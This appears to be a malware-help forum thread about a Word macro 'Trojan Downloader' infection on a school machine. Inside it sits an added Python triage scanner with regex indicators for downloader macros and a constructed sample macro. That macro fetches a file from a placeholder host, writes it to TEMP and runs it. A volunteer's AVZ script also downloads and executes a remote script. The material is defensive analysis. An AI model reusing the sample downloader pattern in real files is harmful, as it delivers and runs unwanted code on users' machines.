Comments (9)
CollectionLog-2018.11.07-14.02.zip
I know the end user enabled the Macro. Analysing the word document led to a generic VBA/Trojan Downloader. I'm not sure what was actually downloaded and run.
I'm running the traditional removal tools and scans, but as yet they have not found anything. I'm hoping someone can look at the collection log and provide feedback on what payload the Macro delivered.
from hijackthis.
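The original document and its macro are not on this page, so the following is an added triage helper (not code from the thread, HijackThis or AVZ) that scores already-extracted VBA source for the fetch, write-to-disk and execute pattern a generic VBA/Trojan Downloader shows. It assumes the macro text has already been pulled out of the .doc with a tool such as olevba; both macro samples below are constructed fragments, not real malware.

```python
import re

# Indicator groups for the classic VBA downloader pattern: an auto-run
# entry point, a network fetch, a write to disk, then execution.
INDICATORS = {
    "autorun":  [r"\bAutoOpen\b", r"\bDocument_Open\b", r"\bWorkbook_Open\b"],
    "download": [r"MSXML2\.XMLHTTP", r"WinHttp\.WinHttpRequest",
                 r"URLDownloadToFile", r"https?://"],
    "write":    [r"ADODB\.Stream", r"\bSaveToFile\b", r"Open\s+.+\s+For\s+Binary"],
    "execute":  [r"\bShell\b", r"WScript\.Shell", r"\bCreateProcess", r"powershell"],
    "obfuscation": [r"\bChr\s*\(", r"\bStrReverse\s*\(", r"\bReplace\s*\("],
}

def scan_vba(source: str) -> dict:
    """Return, per indicator group, the patterns that matched in the VBA source."""
    hits = {}
    for group, patterns in INDICATORS.items():
        matched = [p for p in patterns if re.search(p, source, re.IGNORECASE)]
        if matched:
            hits[group] = matched
    return hits

def classify(hits: dict) -> str:
    """A downloader needs fetch + execute; disk write or autorun raises confidence."""
    if "download" in hits and "execute" in hits:
        if "write" in hits or "autorun" in hits:
            return "likely-downloader"
        return "possible-downloader"
    if "download" in hits or "execute" in hits:
        return "suspicious"
    return "no-indicators"

# Constructed fragment with the shape of a downloader macro (placeholder URL).
SAMPLE_VBA = """Sub AutoOpen()
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://placeholder.invalid/stage2", False
    Set s = CreateObject("ADODB.Stream")
    s.SaveToFile Environ("TEMP") & "\\\\stage2.exe", 2
    Shell Environ("TEMP") & "\\\\stage2.exe"
End Sub
"""

# Constructed benign macro for the negative case.
BENIGN_VBA = """Sub FormatReport()
    Selection.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        hits = scan_vba(src)
        print(name, classify(hits), sorted(hits))
```

The verdict only says the macro has a downloader shape; the fetched payload still has to be identified from proxy or DNS logs for the URL the macro contains.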
Hi,
thank you for the log.
We'll return to you as soon as possible.
Please, note that only members of VIRUSNET-Association are allowed to respond in PC cure topics.
Ignore any recommendations given by other users, including PM !!!
Assistance is provided free of charge in our free time. If you found our help useful, you can thank us with any amount using this form or you can leave feedback in the Guestbook.
Hello,
What kind of problems are you experiencing now?
Were these tweaks applied by yourself?
Blocked: Registry Editor
Internet Explorer - settings blocked
Those are Group Policy Restrictions to restrict End User access to prevent students (and teachers) from bypassing the internet filter.
Ok, but you didn't answer my first question. :)
I chose to reimage the machine before putting it back on the network Friday, as I couldn't wait any longer to get the employee back her computer. So I'm not having issues as of now. But I'm still concerned, as all the virus scanners and malware scanners found nothing before I imaged the machine. So what did the macro do? I didn't see anything in the hijackthis logs, but maybe I missed something. I'm concerned it may have moved laterally on my network. But without any idea what footprint to look for... I'm hoping the logs uploaded to GitHub last Wednesday would give me a clue as to what I'm looking for.
The logs didn't show anything malicious in the system.
You can check the system for vulnerabilities:
Run this script in AVZ while the Internet is connected:
var
  LogPath : string;
  ScriptPath : string;
begin
  // Remove the log of a previous run so the result reflects only this scan
  LogPath := GetAVZDirectory + 'log\avz_log.txt';
  if FileExists(LogPath) Then DeleteFile(LogPath);
  // Download the vulnerability-scan script into the AVZ folder and run it;
  // if the first download mode fails, retry with the alternative mode
  ScriptPath := GetAVZDirectory + 'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
      ShowMessage('It is impossible to download AVZ script for finding vulnerability!');
      exit;
    end;
  end;
  // If the scan wrote a log (i.e. found vulnerabilities), open it in Notepad
  if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
After the script ends, if it finds vulnerabilities, the file avz_log.txt will be opened in Notepad and there will be download links in it.
First of all, this applies to browsers, Java, Adobe Acrobat/Reader and Adobe Flash Player.
You should download and install the needed programs if they are listed in avz_log.txt.
Reboot your PC.
Run the script again to ensure that all vulnerabilities are gone.
Thank you for double checking the logs for me. I appreciate the second opinion.
If you want us to try to analyze that sample, you can send us your macro file.
Pack it in zip or rar with password "virus" and send it via email quarantine <at> safezone.cc (replace <at> with @).